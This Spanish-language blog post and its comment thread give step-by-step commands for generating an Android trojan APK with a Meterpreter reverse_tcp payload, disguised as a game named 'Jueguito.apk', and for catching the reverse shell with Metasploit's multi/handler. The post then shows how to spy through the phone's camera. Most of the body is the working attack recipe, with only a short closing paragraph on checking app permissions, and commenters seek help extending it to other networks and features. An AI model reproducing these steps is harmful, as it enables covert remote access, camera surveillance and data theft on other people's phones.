Origen(Data);

Hackea un dispositivo Android remotamente

e0a1c-evil_android_by_andrewchamp

Hoy en día es posible contar con casi cualquier servicios en un smartphones, ya sea hacer compras, charlar, enviar archivos, enterarse de lo que pasa en el mundo al instante, el tener almacenado tus dato personales, ya sea correos, contraseñas, etc… Por eso que es uno de los puntos de mira de los piratas informáticos, por que es uno de los aparatos que mas utiliza uno para almacenar información privada y valiosa.

Demostrare un ejemplo sencillo de como tener acceso a un dispositivo Android en pocos pasos…

Tendremos que abrir una terminal para usar la herramienta msfpayload que es la que nos servirá para que hagamos nuestro Troyano tipeando lo siguiente:

 $ msfpayload android/meterpreter/reverse_tcp LHOST="IP_Privada" R > /root/Jueguito.apk
Hackea un dispositivo Android remotamente

Nota: Aquí es donde se genera la APK en el directorio /root

Luego nos dirigimos a abrir otra terminal e iniciamos el Metasploit:
 $ msfconsole

Utilizaremos el manejador (Handler) de Metasploit

 $ use exploit/multi/handler
 $ set payload android/meterpreter/reverse_tcp
 $ set LHOST "IP_Privada"
Hackea un dispositivo Android remotamente

Ahora es momento de aventar el anzuelo! Para iniciar el handler debemos de tipear lo siguiente:

 $ exploit
Realizare la instalación de la APK en mi celular. Tome la .APK  que se encontraba en el directorios /root y luego la movil a mi celular.
Hackea un dispositivo Android remotamente
Procedo a instalar la APK, acepto los permisos, y ahora nos dirigimos a Metasploit que ya creo una sesión shell remota. Para hacer una prueba de lo que podemos hacer, seria tipear webcam_list, lo que hace es enlistar las cámaras que tiene el dispositivo, seleccionamos alguna y luego nos conectamos a la cámara con la siguiente orden webcam_snap, que es para tomar una foto o webcam_stream, que es para captar en vivo. 
Hackea un dispositivo Android remotamente
El sentido de esto, es siempre ser precavido, esto es una forma realmente sencilla de como crear un troyano para un dispositivo Android, se consciente de que tipo de aplicación descargas e instalas en un dispositivo donde almacenas información muy importante, procura siempre descargar aplicaciones desde su sitio oficial donde donde los desarrolladores los cuelgan, no digo que sea 100% el también confiable de solo instalar apps de la Google Play pues se a dado casos de apps maliciosas, trata de siempre lee los permisos de instalación.
Hackea un dispositivo Android remotamente
Sentido común de que si mi jueguito.apk es un juego, entonces para que quisiera tener algún permiso para enviar SMS o hacer llamadas telefónicas y Si es posible también procurar revisar el código que cada aplicación.
 Hackea un dispositivo Android remotamente

Android Manifest de la APK

Licencia Creative Commons

Esta obra está bajo una Licencia Creative Commons Atribución 4.0 Internacional.

Licencia Creative Commons

Descubre cómo puedes contribuir a mi blog con donaciones. Tus recompensas me ayudan a seguir creando contenido valioso para la comunidad. Con tan solo un par de clics, puedes marcar la diferencia y apoyarme. ¡Apoya ahora!. 🚀🔥

9 respuestas a “Hackea un dispositivo Android remotamente”

  1. buenas, esto es para controlar remotamente el android si esta en la misma red lan verdad? como podria hacerlo si el android infectado no esta en la misma red, por ejemplo que este usando sus datos.

    Me gusta

  2. estoy haciendo pruebas con mi android, pero al momento de instalarlo en el telefono no me aparece el icono del apk infecta,

    Me gusta

  3. Al estar el meterpreter, nomas tipeas un 'help'
    Y te mostrara las funciones que puedes hacer, como grabar llamadas descargas archivos, ver información del sistema etc, etc, En algunas funciones no tendrás acceso si el terminal android no esta rooteado…

    Me gusta

  4. Hola amigo gracias por el aporte..tienes alguna lista para poder acceder a otros sitios del telefono? osea usar otras cosas que no sea la camara? o solo sirve para poder usar la camara?

    Me gusta

  5. Que tal Fabrizio puede darse el caso de que la terminal android infectada detenga o cierre la apk instalada, y se desconecte de la sesión meterpreter

    Me gusta

  6. Me da este error cuando ya se conecta:
    Meterpreter session 2 closed. Reason: Died
    A que se debe?

    Me gusta

  7. buen dia al iniciar exploit solo me aparece las 2 primeras lineas el resto no aparace

    Me gusta

  8. Hola Angel Bajares, la distribución que utilice es Kali Linux,

    Me gusta

  9. hola amigo. Con que distribucion de linux haces esto?

    Me gusta

Deja un comentario

Crea una web o blog en WordPress.com